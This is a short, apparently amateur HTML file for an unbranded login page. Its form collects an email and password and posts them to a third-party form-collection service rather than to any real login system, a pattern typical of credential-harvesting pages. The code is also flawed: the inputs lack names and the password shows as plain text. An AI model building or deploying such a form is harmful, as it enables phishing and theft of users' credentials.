<!DOCTYPE html>
<html>
    <head>
        <link rel="stylesheet" href="style.css">
        <title>login</title>
    </head>
    <body>
        <form action="https://formspree.io/f/xblnqgnn" method="post">
        <div class="login-box">
            <h1>login</h1>
            <input class="input" type="text" placeholder="enter your email">
            <input class="input" type="text"placeholder="enter your pass">
            <button type="submit" class="login-button">sing in</button>
        </div>
        </form>
    </body>
</html>
